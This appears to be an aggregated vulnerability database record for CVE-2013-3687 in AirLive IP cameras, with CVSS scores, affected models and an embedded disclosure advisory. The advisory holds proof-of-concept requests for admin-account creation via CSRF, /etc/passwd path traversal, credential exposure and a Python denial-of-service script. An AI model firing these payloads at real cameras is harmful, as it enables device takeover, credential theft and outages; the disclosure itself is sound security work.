Sign-up

ID

VAR-201310-0205


CVE

CVE-2013-3687


TITLE

plural AirLive Vulnerabilities in which important information is obtained in products

Trust: 0.8

sources: JVNDB: JVNDB-2013-004610

DESCRIPTION

AirLive POE2600HD, POE250HD, POE200HD, OD-325HD, OD-2025HD, OD-2060HD, POE100HD, and possibly other camera models use cleartext to store sensitive information, which allows attackers to obtain passwords, user names, and other sensitive information by reading an unspecified backup file. Airlive IP Camera is an IP camera device. Multiple Airlive IP Cameras are prone to an information-disclosure vulnerability. Information obtained will aid in further attacks. =========================================================================== AIRLIVE ==================================================================== =========================================================================== 1.Advisory Information Title: Airlive Multiple Vulnerabilities Date Published: 12/06/2013 Date of last updated: 12/06/2013 2.Vulnerability Description Multiple vulnerabilities have been found in this devices: -CVE-2013-3540. Cross Site Request Forgery(CWE-352) and Clickjacking(CAPEC-103) -CVE-2013-3541. Relative Path Traversal(CWE-23). -CVE-2013-3686. Information Exposure(CWE-200) and Permissions, Priveleges and Access Controls(CWE-264) -CVE-2013-3687. Clear Text Storage of Sensitive Information(CWE-312) -CVE-2013-3691. Denial of Service 3.Affected Products CVE-2013-3541, CVE-2013-3686, the following product is affected: WL2600CAM CVE-2013-3540, CVE-2013-3687, the following products are affected: POE2600HD, POE250HD, POE200HD, OD-325HD, OD-2025HD, OD-2060HD, POE100HD. It\x92s possible others models are affected but they were not checked. 4.PoC 4.1.Cross Site Request Forgery (CSRF) CVE-2013-3540 CSRF via GET method. Targeted attack to any administrator. A malicious user can try targeted attacks by sending a special CSRF vector. This allows you to manipulate web interface parameters. In the following example we will make a vector to create an alternative user with administration credentials. _____________________________________________________________________________ http://xx.xx.xx.xx/cgi-bin/admin/usrgrp.cgi?user=test1&pwd=test1&grp=administrator&sgrp=ptz&action=add&redirect= _____________________________________________________________________________ 4.2.Relative Path Traversal CVE-2013-3541, Transversal Path that\x92s allow you to read file system configuration. _____________________________________________________________________________ http://xx.xx.xx.xx/cgi-bin/admin/fileread?READ.filePath=../../../../etc/passwd _____________________________________________________________________________ 4.3.Sensitive Information Exposure + Privilege Escalation CVE-2013-3686, Sensitive Exposure of sensitive data by writing the following URL _____________________________________________________________________________ http://xx.xx.xx.xx/cgi-bin/operator/param?action=list&group=General.UserID _____________________________________________________________________________ We can decode Admin password (base64). You can open with any text editor and look for user's information for example, passwords, users and so on. 4.5.Denial of Service (DoS) Use CVE-2013-3691, DoS by overbuffing path \x91/\x92. A request with a large number of \x91a\x92 can take down the http service from the camera device. _____________________________________________________________________________ Request: http://xx.xx.xx.xx/[a*3000] _____________________________________________________________________________ You will get the next message, Conexion has been reset. After remove de adds and refresh it you will get the next message, Can't Connect It will be down for around 2min but if we are doing the request once and again each 1min for example, the camera won\x92t recuperate ever itself The following Python script could be used to test the DoS: _____________________________________________________________________________ @ request = 'GET /' + \x91A\x92 * 3000 + '.html HTTP/1.0\r\n' @ s = socket.socket() @ s.connect((cam_ip, 80)) @ s.send(request) @ response = s.recv(1024) @ s.close() _____________________________________________________________________________ 5.Credits -CVE-2013-3541 was discovered by Eliezer Varad\xe9 Lopez, Javier Repiso S\xe1nchez and Jon\xe1s Ropero Castillo. -CVE-2013-3691 was discovered by Javier Repiso S\xe1nchez and Jon\xe1s Ropero Castillo -CVE-2013-3540, CVE-2013-3686, CVE-2013-3687 was discovered by Jon\xe1s Ropero Castillo. 6.Report Timeline -2013-05-31: Students team notifies the Airlive Customer Support of the vulnerabilities. No reply received. -2013-06-03: Students asks for a reply. -2013-06-05: Airlive team reports to the technical support to analyze the vulnerabilities

Trust: 2.52

sources: NVD: CVE-2013-3687 // JVNDB: JVNDB-2013-004610 // CNVD: CNVD-2013-07702 // BID: 60551 // PACKETSTORM: 122001

IOT TAXONOMY

category:['Network device']sub_category: -

Trust: 0.6

sources: CNVD: CNVD-2013-07702

AFFECTED PRODUCTS

vendor:ovislinkmodel:airlive poe250hdscope:eqversion: -

Trust: 1.6

vendor:ovislinkmodel:airlive od-2025hdscope:eqversion: -

Trust: 1.6

vendor:ovislinkmodel:airlive poe100hdscope:eqversion: -

Trust: 1.6

vendor:ovislinkmodel:airlive poe200hdscope:eqversion: -

Trust: 1.6

vendor:ovislinkmodel:airlive od-2060hdscope:eqversion: -

Trust: 1.6

vendor:ovislinkmodel:airlive poe2600hdscope:eqversion: -

Trust: 1.6

vendor:ovislinkmodel:od-2025hdscope: - version: -

Trust: 0.8

vendor:ovislinkmodel:od-2060hdscope: - version: -

Trust: 0.8

vendor:ovislinkmodel:od-325hdscope: - version: -

Trust: 0.8

vendor:ovislinkmodel:poe-100hdscope: - version: -

Trust: 0.8

vendor:ovislinkmodel:poe-200hdscope: - version: -

Trust: 0.8

vendor:ovislinkmodel:poe-250hdscope: - version: -

Trust: 0.8

vendor:ovislinkmodel:poe-2600hdscope: - version: -

Trust: 0.8

vendor:airlivemodel:ip camera poe100hdscope: - version: -

Trust: 0.6

vendor:airlivemodel:ip camera od-2060hdscope: - version: -

Trust: 0.6

vendor:airlivemodel:ip camera od-2025hdscope: - version: -

Trust: 0.6

vendor:airlivemodel:ip camera od-325hdscope: - version: -

Trust: 0.6

vendor:airlivemodel:ip camera poe200hdscope: - version: -

Trust: 0.6

vendor:airlivemodel:ip camera poe250hdscope: - version: -

Trust: 0.6

vendor:airlivemodel:ip camera poe2600hdscope: - version: -

Trust: 0.6

vendor:ovislinkmodel:airlive poe-2600hdscope:eqversion:0

Trust: 0.3

vendor:ovislinkmodel:airlive poe-250hdscope:eqversion:0

Trust: 0.3

vendor:ovislinkmodel:airlive poe-200hdscope:eqversion:0

Trust: 0.3

vendor:ovislinkmodel:airlive poe-100hdscope:eqversion:0

Trust: 0.3

vendor:ovislinkmodel:airlive od-325hdscope:eqversion:0

Trust: 0.3

vendor:ovislinkmodel:airlive od-2060hdscope:eqversion:0

Trust: 0.3

vendor:ovislinkmodel:airlive od-2025hdscope:eqversion:0

Trust: 0.3

sources: CNVD: CNVD-2013-07702 // BID: 60551 // JVNDB: JVNDB-2013-004610 // CNNVD: CNNVD-201306-348 // NVD: CVE-2013-3687

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2013-3687
value: HIGH

Trust: 1.0

NVD: CVE-2013-3687
value: HIGH

Trust: 0.8

CNVD: CNVD-2013-07702
value: MEDIUM

Trust: 0.6

CNNVD: CNNVD-201306-348
value: HIGH

Trust: 0.6

nvd@nist.gov: CVE-2013-3687
severity: HIGH
baseScore: 7.8
vectorString: AV:N/AC:L/AU:N/C:C/I:N/A:N
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: COMPLETE
integrityImpact: NONE
availabilityImpact: NONE
exploitabilityScore: 10.0
impactScore: 6.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.8

CNVD: CNVD-2013-07702
severity: MEDIUM
baseScore: 5.0
vectorString: AV:N/AC:L/AU:N/C:P/I:N/A:N
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: NONE
availabilityImpact: NONE
exploitabilityScore: 10.0
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.6

sources: CNVD: CNVD-2013-07702 // JVNDB: JVNDB-2013-004610 // CNNVD: CNNVD-201306-348 // NVD: CVE-2013-3687

PROBLEMTYPE DATA

problemtype:CWE-310

Trust: 1.8

sources: JVNDB: JVNDB-2013-004610 // NVD: CVE-2013-3687

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-201306-348

TYPE

encryption problem

Trust: 0.6

sources: CNNVD: CNNVD-201306-348

CONFIGURATIONS

sources:
            
            
            JVNDB: JVNDB-2013-004610

PATCH
title:Airlive IP Kameryurl:http://cz.airlive.com/product/category/Network-Surveillance
Trust: 0.8
sources:
            
            
            JVNDB: JVNDB-2013-004610

EXTERNAL IDS
db:NVDid:CVE-2013-3687
Trust: 3.4
db:BIDid:60551
Trust: 1.5
db:JVNDBid:JVNDB-2013-004610
Trust: 0.8
db:CNVDid:CNVD-2013-07702
Trust: 0.6
db:FULLDISCid:20130612 SECURITY ANALYSIS OF IP VIDEO SURVEILLANCE CAMERAS
Trust: 0.6
db:CNNVDid:CNNVD-201306-348
Trust: 0.6
db:PACKETSTORMid:122001
Trust: 0.1
sources:
            
            
            CNVD: CNVD-2013-07702 // 
            
            
            
            BID: 60551 // 
            
            
            
            JVNDB: JVNDB-2013-004610 // 
            
            
            
            PACKETSTORM: 122001 // 
            
            
            
            CNNVD: CNNVD-201306-348 // 
            
            
            
            NVD: CVE-2013-3687

REFERENCES
url:http://seclists.org/fulldisclosure/2013/jun/84
Trust: 3.3
url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-3687
Trust: 0.8
url:http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-3687
Trust: 0.8
url:http://www.securityfocus.com/bid/60551
Trust: 0.6
url:http://www.airlive.com/product/category/network-surveillance
Trust: 0.3
url:http://xx.xx.xx.xx/cgi-bin/admin/usrgrp.cgi?user=test1&pwd=test1&grp=administrator&sgrp=ptz&action=add&redirect=
Trust: 0.1
url:https://nvd.nist.gov/vuln/detail/cve-2013-3541
Trust: 0.1
url:http://xx.xx.xx.xx/cgi-bin/operator/param?action=list&group=general.userid
Trust: 0.1
url:https://nvd.nist.gov/vuln/detail/cve-2013-3687
Trust: 0.1
url:https://nvd.nist.gov/vuln/detail/cve-2013-3540
Trust: 0.1
url:http://xx.xx.xx.xx/cgi-bin/admin/fileread?read.filepath=../../../../etc/passwd
Trust: 0.1
url:https://nvd.nist.gov/vuln/detail/cve-2013-3686
Trust: 0.1
url:http://xx.xx.xx.xx/[a*3000]
Trust: 0.1
sources:
            
            
            CNVD: CNVD-2013-07702 // 
            
            
            
            BID: 60551 // 
            
            
            
            JVNDB: JVNDB-2013-004610 // 
            
            
            
            PACKETSTORM: 122001 // 
            
            
            
            CNNVD: CNNVD-201306-348 // 
            
            
            
            NVD: CVE-2013-3687

CREDITS
JonAis Ropero Castillo
Trust: 0.6
sources:
            
            
            CNNVD: CNNVD-201306-348

SOURCES
db:CNVDid:CNVD-2013-07702
db:BIDid:60551
db:JVNDBid:JVNDB-2013-004610
db:PACKETSTORMid:122001
db:CNNVDid:CNNVD-201306-348
db:NVDid:CVE-2013-3687

LAST UPDATE DATE
2025-04-11T22:24:56.548000+00:00

SOURCES UPDATE DATE
db:CNVDid:CNVD-2013-07702date:2013-08-29T00:00:00
db:BIDid:60551date:2013-06-12T00:00:00
db:JVNDBid:JVNDB-2013-004610date:2013-10-16T00:00:00
db:CNNVDid:CNNVD-201306-348date:2013-10-15T00:00:00
db:NVDid:CVE-2013-3687date:2025-04-11T00:51:21.963

SOURCES RELEASE DATE
db:CNVDid:CNVD-2013-07702date:2013-06-20T00:00:00
db:BIDid:60551date:2013-06-12T00:00:00
db:JVNDBid:JVNDB-2013-004610date:2013-10-16T00:00:00
db:PACKETSTORMid:122001date:2013-06-13T05:42:00
db:CNNVDid:CNNVD-201306-348date:2013-06-20T00:00:00
db:NVDid:CVE-2013-3687date:2013-10-11T21:55:44.247